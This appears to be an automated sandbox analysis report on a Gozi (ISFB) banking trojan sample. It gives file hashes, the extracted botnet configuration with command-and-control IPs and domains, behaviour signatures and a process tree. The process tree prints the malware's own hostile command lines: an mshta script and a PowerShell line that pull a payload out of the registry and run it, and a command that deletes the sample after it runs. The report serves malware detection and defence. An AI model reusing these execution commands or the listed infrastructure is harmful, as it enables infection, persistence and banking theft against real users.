Overview

overview

10

Static

static

3

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 12:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client.exe

  • Size

    295KB

  • MD5

    ed017c0f334b6d10ac5aca77fe7f9a2a

  • SHA1

    de7a838cbf418f5c093e5bed00254c4c68b82fa7

  • SHA256

    9f710a0fc0cadbf3378c06ca4fefa2486bdf04646201f9efec7cd5a4c97634b4

  • SHA512

    e7210ef6cfb8b9cad8078b8bdc4331eba04c9b7bd87b1aadce8c84560035fe4725161dceaca03608f10f7e02de7120c6dbf345c0ac69c72d5613e85080f58316

  • SSDEEP

    3072:Az6N1tmvikka83g9IGkpt4fMlw5mlg9eidid74+VONrRrCS:bN1cvBka83g9PkUf55B++1r

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3692
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:5104
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4036
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Users\Admin\AppData\Local\Temp\client.exe
          "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5024
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1408
            3⤵
            • Program crash
            PID:3028
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Whqj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Whqj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4792
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name oegyky -value gp; new-alias -name spwdolx -value iex; spwdolx ([System.Text.Encoding]::ASCII.GetString((oegyky "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3124
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fjdlvfxf\fjdlvfxf.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4280
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2DB2.tmp" "c:\Users\Admin\AppData\Local\Temp\fjdlvfxf\CSC26A2A30D916F47529E294BC4A9AADF8C.TMP"
                5⤵
                  PID:3028
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\spi5ik2e\spi5ik2e.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3424
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2EAC.tmp" "c:\Users\Admin\AppData\Local\Temp\spi5ik2e\CSCA29338F38CFA493F814D92A9E0CF4B85.TMP"
                  5⤵
                    PID:2948
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4136
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:4240
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:2980
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:3292
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5024 -ip 5024
              1⤵
                PID:3628
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
                1⤵
                  PID:3784
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2396

                Network

                MITRE ATT&CK Matrix ATT&CK v13

                Initial Access

                Execution

                Persistence

                Privilege Escalation

                Defense Evasion

                Credential Access

                Discovery

                Query Registry

                1
                T1012

                System Information Discovery

                2
                T1082

                Remote System Discovery

                1
                T1018

                Lateral Movement

                Collection

                Exfiltration

                Command and Control

                Impact

                Resource Development

                Reconnaissance

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\RES2DB2.tmp
                  Filesize

                  1KB

                  MD5

                  d0797dd4dc47cf0c1a7be209504ce79d

                  SHA1

                  464608e1a051ce63dc66e251cceb9e34e3f9095d

                  SHA256

                  fa4605db4cb5128b2cf2b9676a6af38cd024eb6a521410dc9b1510ca8a20e95e

                  SHA512

                  7bed6da9c9ad80edbfa710a0a8dc8ea1dea48f40a8c66a8d1880592acd33eb9fa99a98c8b4bfb1b7a5bd92f0db670d3dbc5d88258ea5d12501b9ec4db7f38df1

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\RES2EAC.tmp
                  Filesize

                  1KB

                  MD5

                  d93999df7d8958a7714716dc34b442fa

                  SHA1

                  1fb97f504b50304a7af1ff59139eca488d9d7781

                  SHA256

                  dd2bf541028a3a2d116f5b5d15c5f7e6694fedfa448c528418ae828e67a2d9d3

                  SHA512

                  a0e2283900560c622bd4842767d0aa20c3eab54ee4273f91993a2bfe5c80ade307222357f537cb60e30529c5527d8c689bb393adf46b6419d07db9ad06acbdb9

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_drdx0lka.4o3.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\fjdlvfxf\fjdlvfxf.dll
                  Filesize

                  3KB

                  MD5

                  4db221229b295dd85d4702dd3c05067d

                  SHA1

                  a5fca01ff5b9c200b23458f6fee5d104236c554c

                  SHA256

                  de691309a6fcd0bb8ecec167037798205a4ebc1e24712bbfb508b4401a86beee

                  SHA512

                  255693fd56ab6ce552014f7609ba7c848f001ce0004fcfeb071b4c82a55d7db4fa6f81f4d83791da49ccc20654f4ea0ef8c0e28a6e0ccd0656260a523b98d1bd

                  Download Submit
                • C:\Users\Admin\AppData\Local\Temp\spi5ik2e\spi5ik2e.dll
                  Filesize

                  3KB

                  MD5

                  ecd127f8d0e1361593df5d94c749b748

                  SHA1

                  0c1844ad7ac787acc114db057ea0dacda6b4a01f

                  SHA256

                  eb3b351b36c1d037ae3f7eb089a35c0149cc8c32d5a4013cad7543065e178842

                  SHA512

                  8881b3f154dc8d2c18b23fc59b2a75429bbec7ebec7d75254cae11dc1305e2bf3a047a442accdd7a36fd83cfe03c8d1260bb529b663063d3e070a14baf2bab12

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\fjdlvfxf\CSC26A2A30D916F47529E294BC4A9AADF8C.TMP
                  Filesize

                  652B

                  MD5

                  1e4ae792c9be392f7895100fbc24c7e0

                  SHA1

                  f6dd23904d6fcd2125315c37767c23b1590c85c6

                  SHA256

                  0b04e7a5d8be7edb4c511717729ead3f76c43bece086d61b186ba72167212135

                  SHA512

                  2af6a46c40456cbe7e235918e48a5dd3547ceceb9826c08e0f7e84155d6da98585c08a8bbadbb83c4326642dfd4119a145f8cf8a39b15a7871239ec04fe1fdf5

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\fjdlvfxf\fjdlvfxf.0.cs
                  Filesize

                  405B

                  MD5

                  caed0b2e2cebaecd1db50994e0c15272

                  SHA1

                  5dfac9382598e0ad2e700de4f833de155c9c65fa

                  SHA256

                  21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                  SHA512

                  86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\fjdlvfxf\fjdlvfxf.cmdline
                  Filesize

                  369B

                  MD5

                  9e0c703f8b69570e71891cb36117715f

                  SHA1

                  a471cf555f462c0bd0d2955192ca5dd638c3bbfe

                  SHA256

                  7bf046f588c56725e5aeddafe16ba09b2d91259638fa5ff78a4b83ba6452f54a

                  SHA512

                  2d3f4278bcbe620e99594d5476d32dccd40011ca91f27ed0927bf1545dc4955876ac1b5a8be012a2e2347fc902a75f30a4be4c73a63e38695136d3a4a2b50fea

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\spi5ik2e\CSCA29338F38CFA493F814D92A9E0CF4B85.TMP
                  Filesize

                  652B

                  MD5

                  08b423c1e42688c9f77cf268e00631fc

                  SHA1

                  cc70dc7121cb408f16ecb0017f939e12e1c2c3aa

                  SHA256

                  e18f97b1b19b666e104c54fcdc56f307629570dc96d8f442ac52209a6f785eb4

                  SHA512

                  f6f860b002c2e07f397f40f3401bf651f55e88a80bb4a8e45dd7d2c70dfa253e244d833d4038350a9edd16d8f484b059b3a630b599f6ebc75784a75e9b0546af

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\spi5ik2e\spi5ik2e.0.cs
                  Filesize

                  406B

                  MD5

                  ca8887eacd573690830f71efaf282712

                  SHA1

                  0acd4f49fc8cf6372950792402ec3aeb68569ef8

                  SHA256

                  568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                  SHA512

                  2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                  Download Submit
                • \??\c:\Users\Admin\AppData\Local\Temp\spi5ik2e\spi5ik2e.cmdline
                  Filesize

                  369B

                  MD5

                  6a362f65e0aecb13dc345fc6704d3e21

                  SHA1

                  096599a1354fea4a963280ac0c57b380bf571ed5

                  SHA256

                  1d0e05d070468de96548b7d43d3ff76f48d70fe86a9abbd5ad4c4486005e2b66

                  SHA512

                  8d40c8f8a0f430fda598f85bfa6a7c334949d04c556540f2c61797e15d01d5b4174923ce070b007045bda3fe4b6c827e2890553b6b216303b5f9427c8021f5dd

                  Download Submit
                • memory/2396-139-0x000001C3DCB40000-0x000001C3DCB50000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/2980-97-0x0000000000960000-0x00000000009F8000-memory.dmp
                  Filesize

                  608KB

                  Download
                • memory/2980-108-0x0000000000960000-0x00000000009F8000-memory.dmp
                  Filesize

                  608KB

                  Download
                • memory/3124-68-0x00007FFCB7270000-0x00007FFCB7D31000-memory.dmp
                  Filesize

                  10.8MB

                  Download
                • memory/3124-26-0x000001F3F2680000-0x000001F3F2690000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/3124-25-0x000001F3F2680000-0x000001F3F2690000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/3124-39-0x000001F3F2610000-0x000001F3F2618000-memory.dmp
                  Filesize

                  32KB

                  Download
                • memory/3124-24-0x00007FFCB7270000-0x00007FFCB7D31000-memory.dmp
                  Filesize

                  10.8MB

                  Download
                • memory/3124-19-0x000001F3F2580000-0x000001F3F25A2000-memory.dmp
                  Filesize

                  136KB

                  Download
                • memory/3124-53-0x000001F3F2630000-0x000001F3F2638000-memory.dmp
                  Filesize

                  32KB

                  Download
                • memory/3124-55-0x000001F3F2640000-0x000001F3F267D000-memory.dmp
                  Filesize

                  244KB

                  Download
                • memory/3124-69-0x000001F3F2640000-0x000001F3F267D000-memory.dmp
                  Filesize

                  244KB

                  Download
                • memory/3236-57-0x0000000008A10000-0x0000000008AB4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3236-100-0x0000000008A10000-0x0000000008AB4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3236-58-0x00000000024F0000-0x00000000024F1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/3292-89-0x0000027F4EC40000-0x0000027F4ECE4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3292-122-0x0000027F4EC40000-0x0000027F4ECE4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3292-90-0x0000027F4E750000-0x0000027F4E751000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/3692-112-0x00000213AE060000-0x00000213AE104000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3692-71-0x00000213AE060000-0x00000213AE104000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/3692-72-0x00000213AE040000-0x00000213AE041000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4036-77-0x00000257FB950000-0x00000257FB9F4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4036-78-0x00000257FB910000-0x00000257FB911000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4036-117-0x00000257FB950000-0x00000257FB9F4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4136-121-0x000002244D820000-0x000002244D8C4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4136-96-0x000002244D820000-0x000002244D8C4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4136-109-0x000002244D820000-0x000002244D8C4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4136-103-0x000002244D8D0000-0x000002244D8D1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4240-120-0x000001B1A1350000-0x000001B1A13F4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/4240-114-0x000001B1A1310000-0x000001B1A1311000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/4240-111-0x000001B1A1350000-0x000001B1A13F4000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/5024-3-0x0000000000400000-0x0000000002290000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/5024-1-0x0000000002400000-0x0000000002500000-memory.dmp
                  Filesize

                  1024KB

                  Download
                • memory/5024-4-0x0000000002400000-0x0000000002500000-memory.dmp
                  Filesize

                  1024KB

                  Download
                • memory/5024-10-0x0000000000400000-0x0000000002290000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/5024-6-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                  Filesize

                  44KB

                  Download
                • memory/5024-5-0x0000000000400000-0x0000000002290000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/5024-118-0x0000000000400000-0x0000000002290000-memory.dmp
                  Filesize

                  30.6MB

                  Download
                • memory/5024-7-0x0000000004030000-0x000000000403D000-memory.dmp
                  Filesize

                  52KB

                  Download
                • memory/5024-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                  Filesize

                  44KB

                  Download
                • memory/5104-119-0x000001F43D690000-0x000001F43D734000-memory.dmp
                  Filesize

                  656KB

                  Download
                • memory/5104-84-0x000001F43D470000-0x000001F43D471000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/5104-83-0x000001F43D690000-0x000001F43D734000-memory.dmp
                  Filesize

                  656KB

                  Download